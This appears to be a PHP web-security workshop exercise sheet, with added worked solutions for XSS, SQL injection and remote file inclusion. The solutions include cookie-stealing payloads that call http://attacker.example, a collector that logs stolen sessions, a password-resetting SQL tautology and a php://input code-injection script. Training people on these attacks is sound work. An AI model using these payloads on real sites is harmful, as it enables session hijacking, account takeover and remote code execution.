Web Security with PHP - exercises

1. Cross Site Scripting

1.1 Create a script, in PHP or another language, that collects stolen sessions. It can save the data to a database or send it by e-mail. If you are not able to create the script, use 1-xss/exploit/add.php, which accepts login and cookie parameters, and 1-xss/exploit/, which displays the stolen sessions.

1.2 Write a message containing a <script> tag that steals user sessions. You can use document.write('<script src="...">') and document.cookie, which holds all cookies valid for the current page (cookies set with the HttpOnly flag are not included).

1.3 The script strip_tags.php allows only <strong> and <em> tags, but strip_tags() leaves the attributes of allowed tags untouched. Use onmouseover or another event attribute to steal the session. You can use document.createElement('script') with document.getElementById('login').appendChild(), or AJAX. Use a style attribute to spread the element over the whole window so that any mouse movement triggers it.
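Added example for exercises 1.1 to 1.3 (not one of the workshop files): the two injected messages and a collector that records what they send. The collector URL http://attacker.example/add.php, the parameter names (the same login and cookie parameters as 1-xss/exploit/add.php) and the log file location are assumptions.

```php
<?php
// Added example for exercises 1.1 to 1.3; it is not part of the workshop files.
// Assumptions (hypothetical): this file is served as http://attacker.example/add.php,
// takes the same login and cookie GET parameters as 1-xss/exploit/add.php, and
// appends to a log file one directory above the web root.

// 1.2: a message with a <script> tag. document.cookie is appended to the collector
// URL and fetched as a second script, so the browser does the exfiltration for us.
function payload_script_tag(string $collectorUrl): string
{
    $url = "'" . addcslashes($collectorUrl, "'\\") . "'";   // JS string literal
    // "<\/script>" keeps the HTML parser from closing the outer <script> early.
    $js = 'document.write(\'<script src="\' + ' . $url
        . ' + \'?cookie=\' + encodeURIComponent(document.cookie) + \'"><\/script>\');';
    return '<script>' . $js . '</script>';
}

// 1.3: strip_tags() keeps the attributes of the tags it allows, so a <strong>
// survives with its onmouseover and style. The fixed, full-window, transparent
// box means the first mouse movement fires the handler; it then disarms itself.
function payload_onmouseover(string $collectorUrl): string
{
    $url = "'" . addcslashes($collectorUrl, "'\\") . "'";
    $js = "var s=document.createElement('script');"
        . "s.src=$url+'?cookie='+encodeURIComponent(document.cookie);"
        . "document.body.appendChild(s);this.onmouseover=null;";
    return '<strong onmouseover="' . htmlspecialchars($js, ENT_COMPAT) . '"'
        . ' style="position:fixed;top:0;left:0;width:100%;height:100%;opacity:0">x</strong>';
}

// 1.1: the collector. Loaded by the victim's browser as a script, it records the
// request and answers with harmless JavaScript so nothing visible happens.
function record_stolen_session(array $get, array $server, string $logFile): bool
{
    if (!isset($get['cookie']) || $get['cookie'] === '') {
        return false;
    }
    $entry = [
        'time'    => date('c'),
        'login'   => $get['login'] ?? '',
        'cookie'  => $get['cookie'],
        'ip'      => $server['REMOTE_ADDR'] ?? '',
        'referer' => $server['HTTP_REFERER'] ?? '',   // the page that was injected
    ];
    return file_put_contents($logFile, json_encode($entry) . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// The listing page. Everything is escaped: a stolen value may itself carry
// markup, and the attacker's page is as injectable as anyone else's.
function render_stolen_sessions(string $logFile): string
{
    $rows = is_file($logFile) ? file($logFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    $html = "<table>\n<tr><th>time</th><th>ip</th><th>login</th><th>cookie</th></tr>\n";
    foreach ($rows as $line) {
        $e = json_decode($line, true);
        if (!is_array($e)) {
            continue;
        }
        $html .= '<tr>';
        foreach (['time', 'ip', 'login', 'cookie'] as $k) {
            $html .= '<td>' . htmlspecialchars((string) ($e[$k] ?? ''), ENT_QUOTES, 'UTF-8') . '</td>';
        }
        $html .= "</tr>\n";
    }
    return $html . "</table>\n";
}

$logFile = __DIR__ . '/../stolen_sessions.log';   // outside the web root (assumed layout)
if (PHP_SAPI === 'cli') {
    // Run from the command line: print the two messages to paste into the vulnerable forms.
    echo payload_script_tag('http://attacker.example/add.php'), "\n\n";
    echo payload_onmouseover('http://attacker.example/add.php'), "\n";
} elseif (isset($_GET['list'])) {
    echo render_stolen_sessions($logFile);
} else {
    record_stolen_session($_GET, $_SERVER, $logFile);
    header('Content-Type: text/javascript');
    echo "/* ok */\n";
}
```

Both payloads send only what document.cookie exposes; a session cookie set with HttpOnly never reaches the collector. The script still runs inside the victim's session, which is why the exercise also mentions AJAX: requests made from the injected script carry the cookie even when it cannot be read.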

2. SQL Injection

2.1 Change the passwords of all users. Hint: the login is not properly escaped.

2.2 Delete all authors from the SQLite database.

2.3 Cause an SQL syntax error through the incorrectly applied escaping mysql_real_escape_string($_GET["offset"]). Escaping only protects a value that is enclosed in quotes in the query; think about where offset ends up.
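Added example for exercises 2.1 and 2.3 (not one of the workshop files). The table layout, the query shapes and the use of addslashes() in place of mysql_real_escape_string() are assumptions; the real scripts are not shown, only that the login is not escaped (2.1) and that an escaped offset still breaks the query (2.3). It runs on the in-memory SQLite driver (pdo_sqlite), so the same tautology and the same broken escape can be tried without a MySQL server.

```php
<?php
// Added example for exercises 2.1 and 2.3; not part of the workshop files.
// The users table and the queries are hypothetical stand-ins for the real scripts.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (login TEXT PRIMARY KEY, password TEXT)');
$db->exec("INSERT INTO users VALUES ('alice','a1'), ('bob','b2'), ('carol','c3')");

// 2.1 as a careless script does it: the login is interpolated into the UPDATE
// unescaped, so a quote in it ends the string and the rest becomes SQL.
function change_password_vulnerable(PDO $db, string $login, string $new): int
{
    $sql = "UPDATE users SET password = '$new' WHERE login = '$login'";
    return $db->exec($sql);   // number of rows changed
}

// 2.1 fixed: both values travel as bound parameters, never as SQL text.
function change_password_fixed(PDO $db, string $login, string $new): int
{
    $st = $db->prepare('UPDATE users SET password = ? WHERE login = ?');
    $st->execute([$new, $login]);
    return $st->rowCount();
}

// 2.3: escaping (addslashes() stands in for mysql_real_escape_string(), which
// needs a MySQL connection and is gone in PHP 7) only helps inside quotes. An
// offset used bare after OFFSET stays injectable, and "0'" turns into "0\'",
// which is a syntax error in SQLite and MySQL alike.
function list_users_escaped_offset(PDO $db, string $offset): array
{
    $sql = 'SELECT login FROM users ORDER BY login LIMIT 10 OFFSET ' . addslashes($offset);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// 2.3 fixed: a number is cast to int and bound as one; no quoting question arises.
function list_users_fixed(PDO $db, string $offset): array
{
    $st = $db->prepare('SELECT login FROM users ORDER BY login LIMIT 10 OFFSET :o');
    $st->bindValue(':o', (int) $offset, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Payload for 2.1: closes the string and widens the WHERE to every row, so the
// vulnerable version resets every password while the fixed one matches nobody.
$payload = "x' OR '1'='1";
echo "2.1 vulnerable: ", change_password_vulnerable($db, $payload, 'pwned'), " rows changed\n";
echo "2.1 fixed:      ", change_password_fixed($db, $payload, 'pwned'), " rows changed\n";

// 2.3: the escaped but unquoted offset produces a syntax error instead of rows.
try {
    list_users_escaped_offset($db, "0'");
} catch (PDOException $e) {
    echo "2.3 escaped offset 0': ", $e->getMessage(), "\n";
}
echo "2.3 fixed: ", implode(', ', list_users_fixed($db, "0'")), "\n";
```

The point of 2.3 is that the escaping function did exactly what it promises, and the query still broke: the value was never inside quotes, so the escaped quote is just a stray backslash in the middle of a number. An attacker who notices the error message knows the offset is injected raw.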

3. Variables

3.1 Gain access to the secret information. This is the code used in the script: if ($_POST["password"] == "...") $auth = true;. Note that nothing sets $auth when the comparison fails.

3.2 The credentials of the e_notice.php script are stored in $auth["password"]. Even with the E_NOTICE error level enabled, it can still be easily fooled if you guess just the first letter of the password. Hint: think about what $auth["password"] evaluates to when $auth is a string rather than an array.

4. Include

4.1 Create a text file containing a PHP script that prints the source of index.php, and put it somewhere on the web. If you have no way to perform this step, you can use 4-include/exploit/highlight_file.txt.

4.2 Print the source of index.php by having the original page include the file you created, so that it executes in the page's context.

4.3 You can see that the variable $auth is correctly initialized in index.php. However, it is still possible to display the secret information on the secure page by running it directly, outside the context of index.php, and injecting the variable yourself.

4.4 Imagine that the allow_url_fopen directive is disabled. You can still gain control over the site by passing php://input as the file to include and posting the PHP code in the request body. Create a script that performs this operation. (Since PHP 5.2, including php://input also requires allow_url_include to be enabled.)
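Added example for exercises 4.1, 4.2 and 4.4 (not one of the workshop files): the body of the hosted text file, the URL that makes index.php include it, and the php://input variant that carries the same code in a POST body. The target URL, the name of the GET parameter that selects the included file (page) and the attacker host are assumptions; read the real parameter name off index.php.

```php
<?php
// Added example for exercises 4.1, 4.2 and 4.4; not one of the workshop files.
// Assumptions (hypothetical): the vulnerable page is
// http://target.example/4-include/index.php and takes the file to include in a
// GET parameter called "page". Run this script from the command line.

// 4.1: the text file to host on a web server. Its extension does not matter:
// include() evaluates whatever it fetches, and the victim's PHP does the parsing.
const REMOTE_FILE_BODY = "<?php highlight_file('index.php'); ?>";

// 4.2: with allow_url_fopen on, the page includes the file straight from our server.
function remote_include_url(string $target, string $param, string $hostedFile): string
{
    return $target . '?' . http_build_query([$param => $hostedFile]);
}

// 4.4: with allow_url_fopen off, php://input is still a stream include() can open,
// so the PHP code travels in the POST body of the very request that includes it.
// From PHP 5.2 on this also needs allow_url_include=On (php://input counts as a URL).
/** @return string|false the page body, or false when the request itself failed */
function include_via_php_input(string $target, string $param, string $phpCode)
{
    $url = $target . '?' . http_build_query([$param => 'php://input']);
    $ctx = stream_context_create(['http' => [
        'method'        => 'POST',
        'header'        => "Content-Type: text/plain\r\n",
        'content'       => $phpCode,
        'ignore_errors' => true,   // still read the body on a 4xx/5xx response
    ]]);
    return file_get_contents($url, false, $ctx);
}

if (PHP_SAPI === 'cli') {
    $target = 'http://target.example/4-include/index.php';

    echo "4.1 host this as highlight_file.txt:\n", REMOTE_FILE_BODY, "\n\n";
    echo "4.2 then open:\n",
        remote_include_url($target, 'page', 'http://attacker.example/highlight_file.txt'), "\n\n";

    // 4.4: same result with allow_url_fopen disabled; the payload rides in the POST body.
    $out = include_via_php_input($target, 'page', REMOTE_FILE_BODY);
    echo "4.4 response:\n", $out === false ? "request failed\n" : $out;
}
```

Both routes execute the same highlight_file() call inside index.php, so the relative path resolves against the page's own directory. The php://input route needs nothing hosted anywhere, which is why disabling allow_url_fopen alone does not close a remote include; the include parameter has to be validated against a fixed list of local files.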